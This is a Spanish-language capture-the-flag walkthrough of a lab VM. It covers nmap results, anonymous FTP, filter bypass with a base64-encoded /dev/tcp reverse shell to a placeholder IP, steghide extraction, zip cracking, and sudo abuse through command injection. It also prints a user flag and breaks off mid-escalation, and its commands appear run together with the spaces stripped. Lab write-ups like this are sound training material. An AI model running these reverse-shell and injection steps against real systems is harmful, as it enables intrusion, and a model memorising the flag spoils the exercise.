Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-15 06:26 EDT
Nmap scan report for 192.168.195.139
Host is up (0.0023s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 1001 1001 90 Oct 03 2020 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.195.128
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 09:f9:5d:b9:18:d0:b2:3a:82:2d:6e:76:8c:c2:01:44 (RSA)
| 256 1b:cf:3a:49:8b:1b:20:b0:2c:6a:a5:51:a8:8f:1e:62 (ECDSA)
|_ 256 30:05:cc:52:c6:6f:65:04:86:0f:72:41:c8:a4:39:cf (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Game Info
MAC Address: 00:0C:29:C9:F6:DF (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 2.28 ms 192.168.195.139
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.43 seconds
ftp
ftpanonymous@<IP>
Dentro encontramos un archivo llamado note.txt nos lo descargamos a nuestro host...
getnote.txt
Contiene...
Anurodh told me that there is some filtering on strings being put in the command -- Apaar
Nos saca una ruta llamada secret por la cual podemos enviar comandos, pero para enviar una Reverse Shell no podemos hacer tan facil, ya que tienen delimitado muchos comandos, por lo que ingresaremos lo siguiente...
#Rever shellsh-i>&/dev/tcp/<IP>/<PORT>0>&1
echo<REVER_SHELL_BASE64>|base64-d|/bin/bash
nc-lvnp<PORT>
Ya nos haria conexion con www-data, por lo que vamos a sanitizar nuestra shell...
script/dev/null-cbash
# <Ctrl> + <z>sttyraw-echo; fgresetxtermexport TERM=xterm# Para ver las dimensiones de nuestra consola en el Hoststtysize# Para redimensionar la consola ajustando los parametros adecuadossttyrows<ROWS>columns<COLUMNS>
Si te vas a /var/www/files/images/ encontraras una iamgen llamada hacker-with-laptop_23-2147985341.jpg que si te la pasas a tu host y le sacas la informacion que contiene dejando el salvoconducto vacio te extraera un backup.zip con contraseña...
python3-mhttp.server
wgethttp://<IP>:<PORT>/<IMG>
Para sacar los datos...
steghideextract-sfhacker-with-laptop_23-2147985341.jpg#Seguidamente le das a <ENTER>
Info:
backup.zip
Utilizamos una herramienta para probar fuerza bruta a la password de un .zip...
A parte vemos que le da la bienvenida a un usuario llamado anurodh por lo que la contraseña es de ese usuario, nos conectaremos por ssh mejor para tener una shell mejor...
sshanurodh@<IP>
Una vez dentro con este usuario si hacemos sudo -l veremos lo siguiente...
Matching Defaults entries for anurodh on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User anurodh may run the following commands on ubuntu:
(apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
Por lo que si hacemos lo siguiente...
sudo-uapaar/home/apaar/.helpline.sh#Dentro de la ejecuccionWelcometohelpdesk.Feelfreetotalktoanyoneatanytime!Enterthepersonwhomyouwanttotalkwith:apaarHellouser!Iamapaar,Pleaseenteryourmessage:catlocal.txt{USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}Thankyouforyourprecioustime!
Podemos inyectar comandos y leer la flag del usuario...
{USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}
Si hacemos chmod 777 .helpline.sh autenticado como el otro usuario ya que podemos pondremos que con el usuario con el que estamos en este momento podamos escribir lo que queramos dentro del .sh y luego lo ejecutemos como apaar...